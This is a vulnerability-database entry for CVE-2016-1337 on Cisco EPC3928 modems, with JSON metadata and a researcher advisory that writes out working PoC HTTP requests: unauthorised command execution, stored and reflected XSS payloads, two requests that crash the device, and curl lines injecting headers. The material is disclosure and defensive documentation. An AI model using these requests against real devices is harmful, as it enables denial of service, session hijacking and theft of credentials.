CVE-2016-1337 (GCVE-0-2016-1337)

Vulnerability from cvelistv5 – Published: 2016-07-03 21:00 – Updated: 2024-08-05 22:55

Summary

Severity ?

No CVSS data available.

CWE

Assigner

cisco

References

URL

GSD-2016-1337

Vulnerability from gsd - Updated: 2023-12-13 01:21

Details

Aliases

CVE-2016-1337

Aliases

CVE-2016-1337

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2016-1337",
    "description": "Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a \"Boot Information Disclosure\" issue, aka Bug ID CSCux17178.",
    "id": "GSD-2016-1337",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2016-1337"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2016-1337"
      ],
      "details": "Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a \"Boot Information Disclosure\" issue, aka Bug ID CSCux17178.",
      "id": "GSD-2016-1337",
      "modified": "2023-12-13T01:21:24.955529Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "psirt@cisco.com",
        "ID": "CVE-2016-1337",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a \"Boot Information Disclosure\" issue, aka Bug ID CSCux17178."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "20160608 Cisco EPC 3928 Multiple Vulnerabilities",
            "refsource": "BUGTRAQ",
            "url": "http://www.securityfocus.com/archive/1/538627/100/0/threaded"
          },
          {
            "name": "39904",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/39904/"
          },
          {
            "name": "91541",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/91541"
          },
          {
            "name": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/",
            "refsource": "MISC",
            "url": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:epc3928_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:epc3928:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@cisco.com",
          "ID": "CVE-2016-1337"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a \"Boot Information Disclosure\" issue, aka Bug ID CSCux17178."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-264"
                },
                {
                  "lang": "en",
                  "value": "CWE-200"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/",
              "refsource": "MISC",
              "tags": [
                "Exploit"
              ],
              "url": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/"
            },
            {
              "name": "91541",
              "refsource": "BID",
              "tags": [],
              "url": "http://www.securityfocus.com/bid/91541"
            },
            {
              "name": "39904",
              "refsource": "EXPLOIT-DB",
              "tags": [],
              "url": "https://www.exploit-db.com/exploits/39904/"
            },
            {
              "name": "20160608 Cisco EPC 3928 Multiple Vulnerabilities",
              "refsource": "BUGTRAQ",
              "tags": [],
              "url": "http://www.securityfocus.com/archive/1/538627/100/0/threaded"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "NONE",
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 8.6,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2018-10-09T19:59Z",
      "publishedDate": "2016-07-03T21:59Z"
    }
  }
}

VAR-201607-0005

Vulnerability from variot - Updated: 2024-02-14 22:51

Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a "Boot Information Disclosure" issue, aka Bug ID CSCux17178. The CiscoEPC3928 is a wireless router product from Cisco. A security vulnerability exists in CiscoEPC3928. This issue is being tracked by Cisco Bug ID CSCux17178. Variants of this product can also be affected. Using combination of several vulnerabilities, attacker is able to remotely download and decode boot configuration file, which you can see on PoC video below. The attacker is also able to reconfigure device in order to perform attacks on the home-user, inject additional data to modem http response or extract sensitive informations from the device, such as the Wi-Fi key.

Until Cisco releases workarounds or patches, we recommend verify access to the web-based management panel and make sure that it is not reachable from the external network.

Vulnerabilities: 1) Unauthorized Command Execution 2) Gateway Stored XSS 3) Gateway Client List DoS 4) Gateway Reflective XSS 5) Gateway HTTP Corruption DoS 6) "Stored" HTTP Response Injection 7) Boot Information Disclosure

========

PoC:

Unathorized Command Execution

1 - Channel selection request:

POST /goform/ChannelsSelection HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/ChannelsSelection.asp Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 24

SAHappyUpstreamChannel=3

1 - Response:

HTTP/1.0 200 OK Server: PS HTTP Server Content-type: text/html Connection: close

RELOADvar totaltime=120;function time(){document.formnow.hh.value=(" "+totaltime+" Seconds ");totaltime--;} function refreshStatus(){window.setTimeout("window.parent.location.href='http://192.168.1.1'",totaltime*1000);}mytime=setInterval('time()',1000);

dw(msg_goform34);dw(msg_goform35);refreshStatus();

2 - Clear logs request:

POST /goform/Docsis_log HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Docsis_log.asp Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 41

BtnClearLog=Clear+Log&SnmpClearEventLog=0

2 - Response:

HTTP/1.0 302 Redirect Server: PS HTTP Server Location: http://192.168.1.1/Docsis_log.asp Content-type: text/html Connection: close

Gateway Stored and Reflective Cross Site Scripting

Example #1:

1 \x96 Stored XSS via username change request:

POST /goform/Administration HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Administration.asp Cookie: Lang=en; SessionID=2719880 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 165

working_mode=0&sysname=alert('XSS')&sysPasswd=home&sysConfirmPasswd=home&save=Save+Settings&preWorkingMode=1&h_wlan_enable=enable&h_user_type=common

1 \x96 Response:

HTTP/1.0 302 Redirect Server: PS HTTP Server Location: http://192.168.1.1/Administration.asp Content-type: text/html Connection: close

2 \x96 Redirect request:

GET /Administration.asp HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Administration.asp Cookie: Lang=en; SessionID=2719880 DNT: 1 Connection: keep-alive

2 \x96 Response:

HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Content-Length: 15832

(...) dw(usertype); alert('XSS') (...) Example #2: #1 \x96 Reflected XSS via client list request: POST /goform/WClientMACList HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: 192.168.1.1/WClientMACList.asp Cookie: Lang=en; SessionID=109660 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 62 sortWireless=mac&h_sortWireless=mac" onmouseover=alert(1) x="y #1 \x96 Response: HTTP/1.0 302 Redirect Server: PS HTTP Server Location: 192.168.1.1/WClientMACList.asp Content-type: text/html Connection: close #2 \x96 Redirect request: GET /WClientMACList.asp HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: 192.168.1.1/WClientMACList.asp Cookie: Lang=en; SessionID=109660 Connection: keep-alive #2 \x96 Reponse: HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Content-Length: 7385 (...) (...) - Gateway Client List Denial of Service Device will crash after sending following request. # HTTP Request POST /goform/WClientMACList HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/WClientMACList.asp Cookie: Lang=en; SessionID=109660 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 62 sortWireless=mac&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX - Gateway HTTP Corruption Denial of Service Device will crash after sending following request. # HTTP Request POST /goform/Docsis_system HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Docsis_system.asp Cookie: Lang=en; SessionID=348080 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 106 username_login=&password_login=&LanguageSelect=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In - "Stored" HTTP Response Injection It is able to inject additional HTTP data to response, if string parameter of LanguageSelect won't be too long (in that case device will crash). Additional data will be stored in device memory and returned with every http response on port 80 until reboot. devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10 HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Content-Length: 1469 devil@hell:~$ curl --data "username_login=&password_login=&LanguageSelect=en%0d%0aSet-Cookie: w00t&Language_Submit=0&login=Log+In" http://192.168.1.1/goform/Docsis_system -s > /dev/null devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10 HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Set-Cookie: Lang=en Set-Cookie: w00t Set-Cookie: SessionID=657670 Content-Length: 1469 - Boot Information Disclosure In early booting phase, for a short period of time some administrator functions can be executed, and it is able to extract device configuration file. We wrote an exploit that crash the modem, and then retrieve and decode config in order to obtain users credentials. Exploit video PoC: https://www.youtube.com/watch?v=PHSx0s7Turo ======== CVE References: CVE-2015-6401 CVE-2015-6402 CVE-2016-1328 CVE-2016-1336 CVE-2016-1337 Cisco Bug ID\x92s: CSCux24935 CSCux24938 CSCux24941 CSCux24948 CSCuy28100 CSCux17178 Read more on our blog: http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0005",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "epc3928",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "epc3928",
        "scope": null,
        "trust": 1.4,
        "vendor": "cisco",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04560"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003416"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-294"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1337"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:epc3928_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:epc3928:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-1337"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Patryk Bogdan from Secorda security team.",
    "sources": [
      {
        "db": "BID",
        "id": "91541"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2016-1337",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2016-1337",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2016-04560",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "VHN-90156",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.2,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.1,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-1337",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-1337",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2016-04560",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201606-294",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-90156",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04560"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90156"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003416"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-294"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1337"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a \"Boot Information Disclosure\" issue, aka Bug ID CSCux17178. The CiscoEPC3928 is a wireless router product from Cisco. A security vulnerability exists in CiscoEPC3928. \nThis issue is being tracked by Cisco Bug ID CSCux17178. Variants of this product can also be affected. \nUsing combination of several vulnerabilities, attacker is able to remotely download and decode boot configuration file, which you can see on PoC video below. The attacker is also able to reconfigure device in order to perform attacks on the home-user, inject additional data to modem http response or extract sensitive informations from the device, such as the Wi-Fi key. \n\nUntil Cisco releases workarounds or patches, we recommend verify access to the web-based management panel and make sure that it is not reachable from the external network. \n\nVulnerabilities:\n1) Unauthorized Command Execution\n2) Gateway Stored XSS\n3) Gateway Client List DoS\n4) Gateway Reflective XSS\n5) Gateway HTTP Corruption DoS\n6) \"Stored\" HTTP Response Injection\n7) Boot Information Disclosure\n\n========\n\nPoC:\n\n- Unathorized Command Execution\n\n#1 - Channel selection request:\nPOST /goform/ChannelsSelection HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/ChannelsSelection.asp\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 24\n\nSAHappyUpstreamChannel=3\n\n#1 - Response:\nHTTP/1.0 200 OK\nServer: PS HTTP Server\nContent-type: text/html\nConnection: close\n\n\u003chtml lang=\"en\"\u003e\u003chead\u003e\u003ctitle\u003eRELOAD\u003c/title\u003e\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" /\u003e\u003cscript language=\"javascript\" type=\"text/javascript\" src=\"../active.js\"\u003e\u003c/script\u003e\u003cscript language=\"javascript\" type=\"text/javascript\" src=\"../lang.js\"\u003e\u003c/script\u003e\u003cscript language=\"javascript\" type=\"text/javascript\"\u003evar totaltime=120;function time(){document.formnow.hh.value=(\" \"+totaltime+\" Seconds \");totaltime--;} function refreshStatus(){window.setTimeout(\"window.parent.location.href=\u0027http://192.168.1.1\u0027\",totaltime*1000);}mytime=setInterval(\u0027time()\u0027,1000);\u003c/script\u003e\u003c/head\u003e\u003cbody BGCOLOR=\"#CCCCCC\" TEXT=black\u003e\u003cform name=\"formnow\"\u003e\u003cHR\u003e\u003ch1\u003e\u003cscript language=\"javascript\" type=\"text/javascript\"\u003edw(msg_goform34);\u003c/script\u003e\u003ca href=\"http://192.168.1.1/index.asp\"\u003e\u003cscript language=\"javascript\" type=\"text/javascript\"\u003edw(msg_goform35);\u003c/script\u003e\u003c/a\u003e\u003cscript language=\"javascript\"\u003erefreshStatus();\u003c/script\u003e\u003cinput type=\"text\" name=\"hh\" style=\"background-color:#CCCCCC;font-size:36;border:n\n one\"\u003e\u003c/h1\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e\n\n#2 - Clear logs request:\nPOST /goform/Docsis_log HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/Docsis_log.asp\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 41\n\nBtnClearLog=Clear+Log\u0026SnmpClearEventLog=0\n\n#2 - Response:\nHTTP/1.0 302 Redirect\nServer: PS HTTP Server\nLocation: http://192.168.1.1/Docsis_log.asp\nContent-type: text/html\nConnection: close\n\n\n\n- Gateway Stored and Reflective Cross Site Scripting\n\nExample #1:\n\n#1 \\x96 Stored XSS via username change request:\nPOST /goform/Administration HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/Administration.asp\nCookie: Lang=en; SessionID=2719880\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 165\n\nworking_mode=0\u0026sysname=\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\u0026sysPasswd=home\u0026sysConfirmPasswd=home\u0026save=Save+Settings\u0026preWorkingMode=1\u0026h_wlan_enable=enable\u0026h_user_type=common\n\n#1 \\x96 Response:\nHTTP/1.0 302 Redirect\nServer: PS HTTP Server\nLocation: http://192.168.1.1/Administration.asp\nContent-type: text/html\nConnection: close\n\n\n#2 \\x96 Redirect request:\nGET /Administration.asp HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/Administration.asp\nCookie: Lang=en; SessionID=2719880\nDNT: 1\nConnection: keep-alive\n\n#2 \\x96 Response:\nHTTP/1.1 200 OK\nContent-type: text/html\nExpires: Thu, 3 Oct 1968 12:00:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nConnection: close\nContent-Length: 15832\n\n\u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"\u003e\n\u003chtml lang=\"en\"\u003e\n\u003chead\u003e\n(...)\n\u003ctr\u003e\n\u003ctd\u003e\n\u003cscript language=\"javascript\" type=\"text/javascript\"\u003edw(usertype);\u003c/script\u003e\n\u003c/td\u003e\n\u003ctd nowrap\u003e\n\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\n\u003c/TD\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n(...)\n\n\nExample #2:\n\n#1 \\x96 Reflected XSS via client list request:\nPOST /goform/WClientMACList HTTP/1.1\nHost: 